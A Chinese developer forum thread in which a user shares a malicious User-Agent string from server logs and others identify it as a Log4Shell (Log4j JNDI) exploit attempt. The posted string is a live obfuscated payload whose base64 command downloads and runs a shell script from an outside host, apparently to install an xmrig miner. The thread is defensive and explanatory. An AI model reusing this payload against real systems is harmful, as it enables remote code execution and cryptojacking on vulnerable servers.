V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
kaka6
V2EX  ?  程序员

User-Agent 注入

  •  
  •   kaka6 · 2022-02-10 10:13:48 +08:00 · 3255 次点击
    这是一个创建于 811 天前的主题,其中的信息可能已经有所发展或是发生改变。

    腾讯云最新优惠活动来了:云产品限时1折,云服务器低至88元/年 ,点击这里立即抢购:9i0i.cn/qcloud,更有2860元代金券免费领取,付款直接抵现金用,点击这里立即领取:9i0i.cn/qcloudquan

    (福利推荐:你还在原价购买阿里云服务器?现在阿里云0.8折限时抢购活动来啦!4核8G企业云服务器仅2998元/3年,立即抢购>>>:9i0i.cn/aliyun

    年前部署一个接口服务,通过日志,最近发现经常有 User-Agent 异常注入的访问 其中一个比较诡异的内容:

    t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L2ludGVsLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvaW50ZWwuc2g7IGJhc2ggaW50ZWwuc2ggNDY4cllRTXhuQ3YzWG9GclhmNWkyUWU5eVpyelZTZGdNV2hqaVAyNjRUQWdKNXc0WGU2UGlKdGFGRjc5amhlNWFIaG1rdVNGOEttc0xkczRyN0hNRHhDelJLbU1UN3o=}')
    

    知道这是干嘛的吗

    avatar

    11 条回复  ?  2022-02-17 09:33:19 +08:00
    ThirdFlame
        1
    ThirdFlame  
       2022-02-10 10:15:25 +08:00
    log4shell
    zhazi
        3
    zhazi  
       2022-02-10 10:22:30 +08:00
    maichaide
        4
    maichaide  
       2022-02-10 11:03:53 +08:00
    下载脚本开启探矿服务
    muzuiget
        5
    muzuiget  
       2022-02-10 13:28:35 +08:00
    Log4j 漏洞,就是赌你用 Log4j 把 UserAgent 记录到日志中,实现远程执行代码。
    yundun2021
        6
    yundun2021  
       2022-02-10 13:34:59 +08:00
    有条件可以上 WAF
    yu1u
        7
    yu1u  
       2022-02-10 13:47:12 +08:00
    log4j 漏洞攻击
    0x73346b757234
        8
    0x73346b757234  
       2022-02-10 18:04:25 +08:00
    对面想通过 Log4j 漏洞下载 xmrig 挖矿脚本。多谢老哥提供了个样本,测了下自己的规则能覆盖,嘿嘿。
    kaka6
        9
    kaka6  
    OP
       2022-02-10 22:29:21 +08:00
    @muzuiget 没有用 Log4j 就没事是吧,我是用 python 的 user_agents 记录
    muzuiget
        10
    muzuiget  
       2022-02-10 23:18:08 +08:00
    @kaka6 没用 Java 肯定没事,对方就是随机扫的。
    kaka6
        11
    kaka6  
    OP
       2022-02-17 09:33:19 +08:00
    又收到不少的 User-Agent:
    Go-http-client/1.1
    python-requests/2.20.1
    curl/7.75.0

    而且还来自世界各地,以前没做这么细的记录,现在全网做记录,发现了不少莫明访客
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   1801 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 31ms · UTC 00:50 · PVG 08:50 · LAX 17:50 · JFK 20:50
    Developed with CodeLauncher
    ? Do have faith in what you're doing.


    http://www.vxiaotou.com